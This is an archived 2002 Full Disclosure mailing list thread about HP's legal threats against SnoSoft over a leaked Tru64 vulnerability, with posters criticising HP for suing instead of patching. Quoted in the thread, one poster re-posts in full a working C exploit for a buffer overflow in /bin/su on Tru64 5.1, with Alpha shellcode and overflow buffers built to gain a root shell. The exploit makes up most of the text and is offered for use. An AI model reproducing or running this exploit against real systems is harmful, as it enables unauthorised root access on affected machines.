Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

OT: Snosoft vs HP
From: full-disclosure () lists netsys com (Moyer, Shawn)
Date: Wed, 31 Jul 2002 12:23:01 -0500

I'm looking forward to seeing more of ths novel "why patch when you can sue"
approach. Anybody wanna buy a bunch of Alphas? Cheap? Boo, hiss, and poo on
HP for this juvenile and moronic approach to dealing with an exposure. As I
read the press on this, the vuln has been known since at least spring, yet
still no patch, and when the sploit leaks, these idiots unleash the lawyers.
How lame.

Yes, it leaked through improper channels without a concurrent patch. So? I'm
more disgusted with the fact that it's taken HP this long to fix the vuln. I
guess the fired all the OSF/1 (sorry, Tru64, puke, puke, whatever) people.

I wonder if the Apache Group and Theo's bunch can pull this same swindle.
They both got blindsided by improperly released vuln's too, but rather then
kvetch and whine and point fingers, they fixed 'em and moved on. 

"Please save me, DMCA! I've been violated! Waaaaah!"






--shawn


-----Original Message-----
From: ATD [mailto:simon () snosoft com]
Sent: Wednesday, July 31, 2002 11:27
To: full-disclosure () lists netsys com
Subject: Re: [Full-disclosure] OT: Snosoft vs HP


What is even more interesting is that this issue has been known for
quite a while, yet no one did anything about it.


Adriel


On Wed, 2002-07-31 at 12:22, Len Rose wrote:

It's interesting to note that the exploit was removed from
SecurityFocus' site. I wonder if HP is going to demand people
remove it from all archives everywhere? 

Obligatory exploit:

/*
 /bin/su tru64 5.1
 works with non-exec stack enabled
 
 stripey is the man

 developed at http://www.snosoft.com in the cerebrum labs

 phased
 phased at mail.ru
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

char shellcode[]=
        "\x30\x15\xd9\x43"      /* subq $30,200,$16             */
        "\x11\x74\xf0\x47"      /* bis $31,0x83,$17             */
        "\x12\x14\x02\x42"      /* addq $16,16,$18              */
        "\xfc\xff\x32\xb2"      /* stl $17,-4($18)              */
        "\x12\x94\x09\x42"      /* addq $16,76,$18              */
        "\xfc\xff\x32\xb2"      /* stl $17,-4($18)              */
        "\xff\x47\x3f\x26"      /* ldah $17,0x47ff($31)         */
        "\x1f\x04\x31\x22"      /* lda $17,0x041f($17)          */
        "\xfc\xff\x30\xb2"      /* stl $17,-4($16)              */
        "\xf7\xff\x1f\xd2"      /* bsr $16,-32                  */
        "\x10\x04\xff\x47"      /* clr $16                      */
        "\x11\x14\xe3\x43"      /* addq $31,24,$17              */
        "\x20\x35\x20\x42"      /* subq $17,1,$0                */
        "\xff\xff\xff\xff"      /* callsys ( disguised )        */
        "\x30\x15\xd9\x43"      /* subq $30,200,$16             */
        "\x31\x15\xd8\x43"      /* subq $30,192,$17             */
        "\x12\x04\xff\x47"      /* clr $18                      */
        "\x40\xff\x1e\xb6"      /* stq $16,-192($30)            */
        "\x48\xff\xfe\xb7"      /* stq $31,-184($30)            */
        "\x98\xff\x7f\x26"      /* ldah $19,0xff98($31)         */
        "\xd0\x8c\x73\x22"      /* lda $19,0x8cd0($19)          */
        "\x13\x05\xf3\x47"      /* ornot $31,$19,$19            */
        "\x3c\xff\x7e\xb2"      /* stl $19,-196($30)            */
        "\x69\x6e\x7f\x26"      /* ldah $19,0x6e69($31)         */
        "\x2f\x62\x73\x22"      /* lda $19,0x622f($19)          */
        "\x38\xff\x7e\xb2"      /* stl $19,-200($30)            */
        "\x13\x94\xe7\x43"      /* addq $31,60,$19              */
        "\x20\x35\x60\x42"      /* subq $19,1,$0                */
        "\xff\xff\xff\xff";     /* callsys ( disguised )        */

/* shellcode by Taeho Oh */

main(int argc, char *argv[]) {
int i, j;
char buffer[8239];
char payload[15200];
char nop[] = "\x1f\x04\xff\x47";

bzero(&buffer, 8239);
bzero(&payload, 15200);

for (i=0;i<8233;i++)
        buffer[i] = 0x41;

/* 0x140010401 */

        buffer[i++] = 0x01;
        buffer[i++] = 0x04;
        buffer[i++] = 0x01;
        buffer[i++] = 0x40;
        buffer[i++] = 0x01;

for (i=0;i<15000;) {
        for(j=0;j<4;j++)  {
                payload[i++] = nop[j];
        }
}

for (i=i,j=0;j<sizeof(shellcode);i++,j++)
        payload[i] = shellcode[j];

        printf("/bin/su by phased\n");
        printf("payload %db\n", strlen(payload));
        printf("buffer %db\n", strlen(buffer));

        execl("/usr/bin/su", "su", buffer, payload, 0);

}


_______________________________________________
Full-Disclosure - We believe in it.
Full-Disclosure () lists netsys com
http://lists.netsys.com/mailman/listinfo/full-disclosure

-- 

-------------------------------------------------------
Secure Network Operations, Inc.| http://www.snosoft.com
Cerebrum Project               | cerebrum () snosoft com
Strategic Reconnaissance Team  | recon () snosoft com
-------------------------------------------------------





  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault